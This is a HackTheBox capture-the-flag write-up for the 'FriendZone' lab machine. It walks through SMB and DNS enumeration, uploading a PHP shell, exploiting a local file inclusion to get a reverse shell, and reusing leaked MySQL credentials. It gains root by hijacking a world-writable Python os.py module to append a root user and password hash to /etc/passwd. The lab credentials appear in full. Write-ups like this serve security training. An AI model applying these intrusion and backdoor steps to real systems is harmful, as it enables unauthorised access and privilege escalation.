Nmap
SMB
friendzoneportal.red
DNS Enumeration
friendzone.red
DNS Enumeration
administrator1.friendzone.red
Gobuster
Exploitation
Post exploitation
Privilege escalation: www-data to friend
Privilege escalation: friend to root
Pspy
reporter.py
Exploitation
Welcome to the FriendZone writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
FriendZone
tags: HTB
Easy
Linux
OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -p- -T4 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 18:23 CEST
Nmap scan report for 10.10.10.123
Host is up (0.094s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 113.60 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 21,22,53,80,139,443,445 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 18:28 CEST
Nmap scan report for 10.10.10.123
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.12 (93%), Linux 3.13 (93%), Linux 3.8 - 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -56m08s, deviation: 1h43m55s, median: 3m51s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2021-04-16T19:32:10+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-16T16:32:10
|_ start_date: N/A
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 93.22 ms 10.10.14.1
2 93.39 ms 10.10.10.123
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.38 seconds
SMB
On the other hand, we have an SMB server, we are going to explore it in search of accessible routes and possible files inside.
$ smbclient -L 10.10.10.123
Enter WORKGROUP\root´s password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Within the general
resource we find some credentials.
$ smbclient //10.10.10.123/general
Enter WORKGROUP\root´s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 21:10:51 2019
.. D 0 Wed Jan 23 22:51:02 2019
creds.txt N 57 Wed Oct 10 01:52:42 2018
9221460 blocks of size 1024. 6460352 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \> exit
$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
And within the share Development
we also have access and we can upload a PHP shell that we may be able to use later.
$ smbclient //10.10.10.123/Development
Enter WORKGROUP\root´s password:
Try "help" to get a list of possible commands.
smb: \> put shell.php
putting file shell.php as \shell.php (7,7 kb/s) (average 7,7 kb/s)
smb: \> ls
. D 0 Sat Apr 17 00:00:42 2021
.. D 0 Wed Jan 23 22:51:02 2019
shell.php A 2233 Sat Apr 17 00:00:42 2021
9221460 blocks of size 1024. 6178548 blocks available
smb: \>
In the Nmap
results we can read the friendzone.red
domain and in this website We can see that on the page another domain can be read at the email address info@friendzoneportal.red
.
friendzoneportal.red
DNS Enumeration
Let's see what subdomains it has.
$ dig @10.10.10.123 friendzoneportal.red axfr
; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzoneportal.red axfr
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 100 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: vie abr 16 23:30:02 CEST 2021
;; XFR size: 9 records (messages 1, bytes 309)
friendzone.red
DNS Enumeration
The machine has a working DNS server. We are going to list the domains you have.
$ dig @10.10.10.123 friendzone.red axfr
; <<>> DiG 9.16.4-Debian <<>> @10.10.10.123 friendzone.red axfr
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 96 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: vie abr 16 18:33:55 CEST 2021
;; XFR size: 8 records (messages 1, bytes 289)
We have several subdomains available, we are going to add them to the file /etc/hosts
.
Cool! Inside the general
share we have a file called creds.txt
with some credentials of the user admin
.
administrator1.friendzone.red
Well, checking the subdomains found, I have seen that administrator1.friendzone.red
with HTTPS
shows us a login page.
We test the credentials obtained and they are correct!
Login Done ! visit /dashboard.php
It is telling us that we can use the image_id
and pagename
parameters so, maybe we can upload an image or some file and if we remember, there was a subdomain called uploads.friendzone.red
.
Gobuster
Let's find something that is useful for us to use on the website as parameters.
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://administrator1.friendzone.red/ -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://administrator1.friendzone.red/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/04/16 19:07:20 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/16 19:10:35 Finished
===============================================================
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u https://administrator1.friendzone.red/images/ -x jpg,png,jpeg -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://administrator1.friendzone.red/images/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: jpg,png,jpeg
[+] Timeout: 10s
===============================================================
2021/04/16 19:34:04 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.jpg (Status: 403)
/.htpasswd.png (Status: 403)
/.htpasswd.jpeg (Status: 403)
/.htaccess (Status: 403)
/.htaccess.jpg (Status: 403)
/.htaccess.png (Status: 403)
/.htaccess.jpeg (Status: 403)
/a.jpg (Status: 200)
/b.jpg (Status: 200)
Progress: 16426 / 20471 (80.24%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/04/16 19:44:29 Finished
===============================================================
Playing with the parameters, we can see that the timestamp
parameter is an LFI with which we can read the content of files.
Accesing to this url we can see that it has included it and it shows us the error message. Let's try to see the content of the dashboard.php
file using php://filter/convert.base64-encode/resource=
.
<?php
//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
echo "<br><br><br>";
echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
if(!isset($_GET["image_id"])){
echo "<br><br>";
echo "<center><p>image_name param is missed !</p></center>";
echo "<center><p>please enter it to show the image</p></center>";
echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
}else{
$image = $_GET["image_id"];
echo "<center><img src='images/$image'></center>";
echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
include($_GET["pagename"].".php");
//echo $_GET["pagename"];
}
}else{
echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>
Indeed, as we can see, it is including any file that we pass as a parameter and it includes .php
at the end.
If we remember, at first we upload a PHP shell to Development
. We do not know what its location is but if they tell us the location of Files
which is /etc/Files
so we can think that it will also be that of Development
. We are going to put a terminal to listen and access our shell with the LFI.
Exploitation
Now, we access the https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell with the timestamp
parameter with the path of our shell, we will get our shell.
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.123] 38554
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
00:54:54 up 5:28, 0 users, load average: 0.00, 0.00, 0.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (515): Inappropriate ioctl for device
bash: no job control in this shell
www-data@FriendZone:/$
And now, inside /home/friend
we can read the user flag.
www-data@FriendZone:/home/friend$ cat user.txt
CENSORED_FLAG
Post exploitation
Privilege escalation: www-data to friend
Inside the /var/www
directory we find the mysql_data.conf
file where we can find the MySQL
credentials that will help us escalate to the friend
user.
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
And now, let's connect with SSH!
$ ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ECDSA key fingerprint is SHA256:/CZVUU5zAwPEcbKUWZ5tCtCrEemowPRMQo5yRXTWxgw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ECDSA) to the list of known hosts.
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
Privilege escalation: friend to root
Pspy
2021/04/17 01:58:01 CMD: UID=0 PID=17217 | /usr/bin/python /opt/server_admin/reporter.py
2021/04/17 01:58:01 CMD: UID=0 PID=17216 | /bin/sh -c /opt/server_admin/reporter.py
reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
Looking at the script, we can see that there is nothing running except a print, but an import of the os
library is being carried out on which if we list the library's permissions we can see that we have permission to edit it and we can inject into it a reverse shell that will be executed when the reporter.py
script is launched by cron.
friend@FriendZone:~$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
Exploitation
We are going to add the following lines in the os.py
library to inject a user with root privileges in the /etc/passwd
file.
passwd = open('/etc/passwd', 'r').readlines()
if not any('x4v1l0k' in s for s in passwd):
output = open('/etc/passwd', 'a')
output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash')
output.close()
Now we just have to wait for the task to run... and we will be root!
friend@FriendZone:~$ su x4v1l0k
Password:
root@FriendZone:/home/friend# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:/home/friend# cat /root/root.txt
CENSORED_FLAG